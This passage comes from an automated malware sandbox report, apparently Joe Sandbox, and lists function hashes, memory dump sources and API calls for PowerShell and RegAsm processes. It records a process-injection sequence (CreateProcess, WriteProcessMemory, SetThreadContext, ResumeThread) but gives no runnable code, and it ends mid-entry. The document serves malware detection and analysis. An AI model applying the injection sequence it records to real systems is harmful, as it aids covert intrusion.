Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86136773ba7ac4d94fc09e9042942c930efd2d10839d807ace836a6e270821ff
Instruction ID: 0ebc7cbd4d57e20fcfdf9cea8b4b8c58554e9c6eb1c82a18b5367336c7210a3f
Opcode Fuzzy Hash: 86136773ba7ac4d94fc09e9042942c930efd2d10839d807ace836a6e270821ff
Instruction Fuzzy Hash: 08F0B431A0D9058FE659EB4CE4055E473E1FF54360B1500B7E01DC7163CB29EC44C788

Function 00007FF848D34400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4127d83862082e5a5a75ff7f5832528e0578aa3a1c6e94d44b7c7d673e9cc4e9
Instruction ID: d92b3168d3dac78b8a9d1b94fba33a2a2814467fce73361d9395eee5d43189ad
Opcode Fuzzy Hash: 4127d83862082e5a5a75ff7f5832528e0578aa3a1c6e94d44b7c7d673e9cc4e9
Instruction Fuzzy Hash: 6FF0BE31A0D5488FE754EB4CE445AA8B3E0FF04320B1500B7E009C7063DB2AEC54C754

Function 00007FF848D341D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: ac63b412e0c0cbf952c404184577b8a4ed4a0f56f2ef6b016719bb4f0ef02fc0
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: 44E0123170C8048FE6A9EB4CE0409A973E2FBA8371B1101B7D14EC7561C725EC558B84

Non-executed Functions

Function 00007FF848C68BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

N_^K, xrefs: 00007FF848C68C6A
N_^?, xrefs: 00007FF848C68C2A
N_^Y, xrefs: 00007FF848C68CBA
N_^Q, xrefs: 00007FF848C68C8A
N_^N, xrefs: 00007FF848C68C72
N_^J, xrefs: 00007FF848C68C62
N_^8, xrefs: 00007FF848C68BF2
N_^<, xrefs: 00007FF848C68C12

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
API String ID: 0-2388461625
Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
Instruction ID: 246d680f43fb5cf9f7d68663af1b8adec450393ad26462f8e6625c1b6df7f3db
Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
Instruction Fuzzy Hash: BD2107B3A895115AC30637BCFC515E86BC1EF543B874501F3E218CF113DA24648BCA9A

Function 00007FF848C6849B Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF848C686C2
N_^, xrefs: 00007FF848C6856A
N_^, xrefs: 00007FF848C6852A
N_^, xrefs: 00007FF848C68772

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-1196809394
Opcode ID: 7bdcaa2f3786be7424c276a132a0ea9b6338178f87da09e3d74462bbd0011366
Instruction ID: f2d5ee92db19aa421cc52acd49ba0e4a665c643d626554c8cfcda750947e0ea8
Opcode Fuzzy Hash: 7bdcaa2f3786be7424c276a132a0ea9b6338178f87da09e3d74462bbd0011366
Instruction Fuzzy Hash: A151B552E0E2D24FE393F2286C750F53F50DF522A5F1900F3D1999B0D3EB186846A26A

Function 00007FF848C684C4 Relevance: 5.2, Strings: 4, Instructions: 158COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF848C686C2
N_^, xrefs: 00007FF848C6856A
N_^, xrefs: 00007FF848C6850A
N_^, xrefs: 00007FF848C684C9

Memory Dump Source

Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-1196809394
Opcode ID: 43672c817faabf1dfd3461dd4b7f6df725ba52d2ac65bfc009477428d1903b27
Instruction ID: cec43ad418100b8758a1cc38b84c0955b5f550498c3bb755c5aafefec0349910
Opcode Fuzzy Hash: 43672c817faabf1dfd3461dd4b7f6df725ba52d2ac65bfc009477428d1903b27
Instruction Fuzzy Hash: F4414153E0E6D24FF392A63C68750FA2F90DF522A4F0D00F7D1D99B093DA086446E26A

Analysis Process: powershell.exePID: 5436, Parent PID: 1088COMMON

Executed Functions

Function 00007FF848C533B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2343705254.00007FF848C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff848c50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction ID: 715a2b63cf84a7cbce0682c4a8050d4c647038655c02f1c462a3bb900db61f69
Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
Instruction Fuzzy Hash: 8B01A73010CB0C4FDB44EF0CE051AA5B3E0FB95360F10052DE58AC3661DB32E882CB45

Analysis Process: powershell.exePID: 5792, Parent PID: 1088COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF848D50002 Relevance: 2.9, Strings: 2, Instructions: 391
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hsH, xrefs: 00007FF848D50194
hsH, xrefs: 00007FF848D502BE

Memory Dump Source

Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID: hsH$hsH
API String ID: 0-2288426561
Opcode ID: 5a4cb70541662bf96e30a1ac2751f0074ee0103ecbe4d76c3f8a4ea6a9b2e1bf
Instruction ID: a40d354d0abc48b9219f38fb72992211a13a4f1c628092779729acf1ee40a6ba
Opcode Fuzzy Hash: 5a4cb70541662bf96e30a1ac2751f0074ee0103ecbe4d76c3f8a4ea6a9b2e1bf
Instruction Fuzzy Hash: A4B1A36190FBC64FE757AB3C5864A61BFE0EF57250B1901FBC089CB1A3DA189C4AC356

Function 00007FF848C865A4 Relevance: 2.5, APIs: 1, Instructions: 956
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32 ref: 00007FF848C86D3C

Memory Dump Source

Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a1d0dc4579bf1628a8e714c3494d1383dacfdf06530f404960062cbb9771e28d
Instruction ID: 36fac0a46c4c2bdc584728ef0e48ec411d8f2f6489652092168043bd85117b91
Opcode Fuzzy Hash: a1d0dc4579bf1628a8e714c3494d1383dacfdf06530f404960062cbb9771e28d
Instruction Fuzzy Hash: C5E1C53091CA8D4FDBA9EF28CC5A7E577E0FB55351F04426AD84DC7291DF38A9418B82

Function 00007FF848C86244 Relevance: 1.7, APIs: 1, Instructions: 151
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FF848C86335

Memory Dump Source

Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7100992aeb792f08ff3763289385c1e16402839ea65ef7b5da8dc4c9a90e0295
Instruction ID: c3000752787796f86b909a4cafcb4e7df828925f48b921177b9ab8d55062a196
Opcode Fuzzy Hash: 7100992aeb792f08ff3763289385c1e16402839ea65ef7b5da8dc4c9a90e0295
Instruction Fuzzy Hash: 7641153190CB5C8FDB58EB98984A6F97BE0FB95311F00426FE049D3292DB78A8458786

Function 00007FF848C86038 Relevance: 1.6, APIs: 1, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FF848C860F4

Memory Dump Source

Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0c7fa5e414630599ac28bd2f9240643333601cd2718096618f702b52c6079218
Instruction ID: 8766c87642e4617ca79bb840bb36c51d0843827265723086726ece580b854634
Opcode Fuzzy Hash: 0c7fa5e414630599ac28bd2f9240643333601cd2718096618f702b52c6079218
Instruction Fuzzy Hash: 0431F831D0CB484FDB29EBA8A8496F97BE1EF55311F04423FD049D3592DF7864068795

Function 00007FF848C85F3D Relevance: 1.6, APIs: 1, Instructions: 116
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF848C85FF7

Memory Dump Source

Source File: 0000000C.00000002.2467898547.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848c80000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 02816bd3cec202ae23c85edcc2d665bb0743d040b855016dbb1bc5e893f607d0
Instruction ID: f951d44f275f366d67ba373a9a0bdd764f92ff51cc11a22c76cd114f53c4de3b
Opcode Fuzzy Hash: 02816bd3cec202ae23c85edcc2d665bb0743d040b855016dbb1bc5e893f607d0
Instruction Fuzzy Hash: 0931283190D7884FDB5AEB6888466E97FE0EF57321F0842AFC049C7193DA785405C792

Function 00007FF848D500DD Relevance: 1.4, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hsH, xrefs: 00007FF848D50194

Memory Dump Source

Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID: hsH
API String ID: 0-2187675551
Opcode ID: 111777aceef36d61303f0cc3f6dce760724ea264e2d3ecbcb351eefa8d03234d
Instruction ID: 0fa7c8348cc0f0f7035a023599ec5810e4e2d77305db109bb1bf9746a9d2889d
Opcode Fuzzy Hash: 111777aceef36d61303f0cc3f6dce760724ea264e2d3ecbcb351eefa8d03234d
Instruction Fuzzy Hash: E241633160EBC98FDB46EF388450A657FA1EF57354B1901EBC089CB193C915EC4AC755

Function 00007FF848D50ADE Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9005ca10411d78da13f4f599814762fc41e2aaf566ef860fcb368087907e674a
Instruction ID: 74a2e2fe2c522be5804bf9d3e533bc93436b1fe3fa5443b6c3ef553094c872b2
Opcode Fuzzy Hash: 9005ca10411d78da13f4f599814762fc41e2aaf566ef860fcb368087907e674a
Instruction Fuzzy Hash: 03411622F1FE5A4FEBA9BA2814953B9B3D1EF44795F48007BD40DC3186DF08AC098795

Function 00007FF848D515C1 Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2475040368.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff848d50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4be1990e08a31ef55925e0582ac60217ab641cf34e8cf4f6304421a130d5f535
Instruction ID: 299135a81443335d7dcf2658a2d37e5598c299204abaeb5169295dabba6a09b7
Opcode Fuzzy Hash: 4be1990e08a31ef55925e0582ac60217ab641cf34e8cf4f6304421a130d5f535
Instruction Fuzzy Hash: 9B110B32B1EB444FEB59AA2C64052B9B7E1FF89165F0801BFD04AC3452DB15980A8245

Analysis Process: RegAsm.exePID: 7212, Parent PID: 5792COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	132
Total number of Limit Nodes:	15

Executed Functions

Function 05EA9C18 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 05EAB0B1

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d727dca47326ab7f3fb16015ea731f35678041dd1f1f7080d87cbc6e2655a8b9
Instruction ID: a4fa7478dd0724ea70536e8914a5281e7561a5bb833aa47f181dffb852c740bb
Opcode Fuzzy Hash: d727dca47326ab7f3fb16015ea731f35678041dd1f1f7080d87cbc6e2655a8b9
Instruction Fuzzy Hash: A19106B1D00309DFDB15CFA9C88479EBBF6BF88304F25812AE455AB250D770A945CF91

Function 05EAAEBB Relevance: 1.7, APIs: 1, Instructions: 218
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,00000000,?), ref: 05EAB0B1

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4a907a00f88bc2d06375344c8b3e8c2cd3312c4b40198dc510f8adb64ea3f1fe
Instruction ID: a7d457995590b7682b1392f2e924af5848e03b488fd17859df78e4cb7b8912b6
Opcode Fuzzy Hash: 4a907a00f88bc2d06375344c8b3e8c2cd3312c4b40198dc510f8adb64ea3f1fe
Instruction Fuzzy Hash: 6591F6B1D00319DFDB15CFA9C88479EBBF6BF88304F25812AE459AB250D770A945CF91

Function 00D2F378 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cbbdf4ff0ef1e99dfc93071f3d237ea25b874be6e1584d2dca6475243bacdc9b
Instruction ID: 3d9338ebd3e9316d30b85635e8454fb203037902918b2e1b8d8edd4cd32b9abe
Opcode Fuzzy Hash: cbbdf4ff0ef1e99dfc93071f3d237ea25b874be6e1584d2dca6475243bacdc9b
Instruction Fuzzy Hash: 03815470A00B158FD724DF29E441B5ABBF5FF88708F04892ED48AD7A50DB74E806CBA0

Function 05EA1FC0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000000,038942CC,028B514C), ref: 05EA2047

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e11792c26e202a5b63227fcc72515280c81a045170379c074e9e428316b599a
Instruction ID: 628b5c08cd77bcde2d9975a7a993f716ca053cf872da5c3125f866526d42721e
Opcode Fuzzy Hash: 6e11792c26e202a5b63227fcc72515280c81a045170379c074e9e428316b599a
Instruction Fuzzy Hash: 7B315D317402009FC308EB69E895B5A77EAFF84704B4884A9E1469F269DF75ED06CB90

Function 00D254D8 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00D2550A

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8bb7915fb8f13619c44a926979e4296709cf14976d6d3a9927442e6dc0d0277c
Instruction ID: e32b3f1c99456e87c9e428868301d6d0e161468cd6ef6a966d05e36f81595528
Opcode Fuzzy Hash: 8bb7915fb8f13619c44a926979e4296709cf14976d6d3a9927442e6dc0d0277c
Instruction Fuzzy Hash: BC317331A102159FCB04DF38E594AADBBF6EF98301B188165D809DB36ADB35DD46CBA0

Function 00D254E8 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 00D2550A

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b4bb816bf0cc10803e288e98bdabf3b1eda42320e0177dd6a5e6af0aebc19f64
Instruction ID: 2005db7eb3a0b56e4e4376f8df57079dc9f8c2a83087894908561463e8932df8
Opcode Fuzzy Hash: b4bb816bf0cc10803e288e98bdabf3b1eda42320e0177dd6a5e6af0aebc19f64
Instruction Fuzzy Hash: 33318031A002158FCB04DF68E9949ADBBF6EF98305B188165D409DB36ADB35DD45CBA0

Function 05EA1FAF Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000000,038942CC,028B514C), ref: 05EA2047

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 2638ced05b0e3e88ada5f6a6b03b9c6081c62b991a982ba610ebb2a2e746ca69
Instruction ID: 3a807315d542547d39862b25f54fdd5cef33491a8702550ad6beb6da9de1d2d4
Opcode Fuzzy Hash: 2638ced05b0e3e88ada5f6a6b03b9c6081c62b991a982ba610ebb2a2e746ca69
Instruction Fuzzy Hash: 5131BA356402008FC309EB68E895E597BF2FF85708B4884ADE046CF266CB76ED06CB90

Function 05EA9CC0 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6070521b9bde4566b71c8a5f9311ecec9da428315b8aba68ba85fa7ebbd7d31b
Instruction ID: 57147fafa41deca06635fd28510c9f031946c92348603228c3220f983d41a7c1
Opcode Fuzzy Hash: 6070521b9bde4566b71c8a5f9311ecec9da428315b8aba68ba85fa7ebbd7d31b
Instruction Fuzzy Hash: 5721A2718083889FDB01DF69C8906DFBFF8EF49314F14409AD594AB252D278A944CFA5

Function 00D286F8 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D28787

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5f3f9fb987ef45b45ec9126383d8ec976dac1f1158230c8ea3f2c9649950578e
Instruction ID: 0cc6c3e64e89f28bc7947866b08a549073fb5e03b6330d94d5a422f8265bec07
Opcode Fuzzy Hash: 5f3f9fb987ef45b45ec9126383d8ec976dac1f1158230c8ea3f2c9649950578e
Instruction Fuzzy Hash: 6B21F6B5D012099FDB10CFAAD984ADEFBF5EB48314F14841AE914A3310D778A955CFA1

Function 00D28700 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D28787

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 298ba3090d65d1c0b4f425e331282ea1ab08739422898e915e8eb2af15bbcac8
Instruction ID: 61b5c2ea5e67239a98f9cc0695a5e185d6722b16d9b9656b115e38e3afc623e1
Opcode Fuzzy Hash: 298ba3090d65d1c0b4f425e331282ea1ab08739422898e915e8eb2af15bbcac8
Instruction Fuzzy Hash: 2A21F4B5D002089FDB10CF9AD984ADEBBF4EB48314F14841AE914A3310C778A944CFA1

Function 00D2E284 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,00D2F394), ref: 00D2F5CE

Memory Dump Source

Source File: 0000000F.00000002.2985276421.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_d20000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b2b89fd324b945b835b67bcd111295b242a81ead07d608a45086583d0f886bd1
Instruction ID: 69e263c33aaf624a3248c99150a358c0c824c220f263f7c8ab9e1eeb0a2fe11f
Opcode Fuzzy Hash: b2b89fd324b945b835b67bcd111295b242a81ead07d608a45086583d0f886bd1
Instruction Fuzzy Hash: 911100B5C002598BCB10CF9AD444A9EFBF4EF48314F14846AD929A7300D379A945CFA1

Function 05EA9C41 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7216ef36ad001a14f865302f17a2fd5a06ee7f35c95c449fb567a4c3c1f98c75
Instruction ID: 38085dbfb2bda656718a32cf07d49a4ec251f85af89ff5545e6164ca511bf7d5
Opcode Fuzzy Hash: 7216ef36ad001a14f865302f17a2fd5a06ee7f35c95c449fb567a4c3c1f98c75
Instruction Fuzzy Hash: F21126B58043498FDB10CFA9C944BEEBBF8EB88314F10845AD558AB241D375A544CFA1

Function 05EA9CB0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ff4b4def1da3eeb56e381f3d7d6696989017d06ff0ca0602b522d6ab4816fc68
Instruction ID: f9b35dff5eb21a6770b55efb4fdbed38603c712082921b362119086468a1deb8
Opcode Fuzzy Hash: ff4b4def1da3eeb56e381f3d7d6696989017d06ff0ca0602b522d6ab4816fc68
Instruction Fuzzy Hash: B81102B58003499FDB10DF9AC945BEEBBF8FB88314F10845AE958A7340D378A944CFA5

Function 05EAC3A0 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 05EAC3FD

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7a3f329439935c6b8ecc6ea1b08608ffacc10560483f0d17db3b8f5266ed2b27
Instruction ID: ae2cb6c8d40fed35d1dcc183e250c43e7a4ef8335adf29b6ac4f9025a5e39be8
Opcode Fuzzy Hash: 7a3f329439935c6b8ecc6ea1b08608ffacc10560483f0d17db3b8f5266ed2b27
Instruction Fuzzy Hash: 0911E0B5C046498FDB10DF9AD944ADEFBF4EB48314F10846AD959B7300D378A544CFA5

Function 05EAC398 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 05EAC3FD

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 77cfaceffff8dd6976771989c1638a1480f9fd6fbf5aa26b1d4f7e3cbe1c141e
Instruction ID: 1f443c23537c068c035e2754d45faef749c30da15243e5c12d80f490174b35cc
Opcode Fuzzy Hash: 77cfaceffff8dd6976771989c1638a1480f9fd6fbf5aa26b1d4f7e3cbe1c141e
Instruction Fuzzy Hash: F811FDB6C006498FCB10CFAAD544ADEBBF4AB48214F20846AD468B7200D338A944CFA5

Function 05EAB63F Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 05EAB69D

Memory Dump Source

Source File: 0000000F.00000002.3049247356.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5ea0000_RegAsm.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ddbe471af3a5402bb958ed80650c60a7a2bd883d4e41f2020bcaede37f6e1fbb
Instruction ID: b216f2d07eacebe04c38c1250fc8cc83a98455241c9ee634faaedbe873b16980
